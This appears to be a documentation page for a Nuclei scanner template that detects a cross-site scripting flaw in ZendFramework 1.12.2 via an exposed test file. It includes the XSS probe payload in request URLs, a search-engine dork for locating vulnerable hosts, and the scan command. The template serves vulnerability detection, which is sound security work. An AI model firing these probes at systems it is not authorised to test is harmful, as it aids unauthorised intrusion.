Skip to content

ZendFramework 1.12.2 - Cross-Site Scripting

ID: zend-v1-xss

Severity: medium

Author: c3l3si4n

Tags: zend,zendframework,xss

ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.

id: zend-v1-xss
info:
name: ZendFramework 1.12.2 - Cross-Site Scripting
author: c3l3si4n
severity: medium
description: |
ZendFramework of versions <=1.12.2 contain a cross-site scripting vulnerability via an arbitrarily supplied parameter.
reference:
- https://twitter.com/c3l3si4n/status/1600035722148212737
classification:
cpe: cpe:2.3:a:zend:zend_framework:1.12.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: zend
product: zend_framework
google-query: inurl:"/tests/Zend/Http/"
tags: zend,zendframework,xss
http:
- method: GET
path:
- "{{BaseURL}}/vendor/diablomedia/zendframework1-http/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(1)>"
- "{{BaseURL}}/tests/Zend/Http/Client/_files/testRedirections.php?redirection=3&param=<img/src=x%20onerror=alert(document.domain)>"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"redirection"]'
- '"param"'
- '<img/src=x onerror=alert(document.domain)'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100d38bfc319cc4addeb8c304024fed0a6d14dfdf3609da7b90c9d605fb6ed6cb3b02207bd1eb3ef32a03b99f3df0be9a816c9328a15847f8e5a28a687f3e71a2dbc725:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/zend/zend-v1-xss.yaml"

View on Github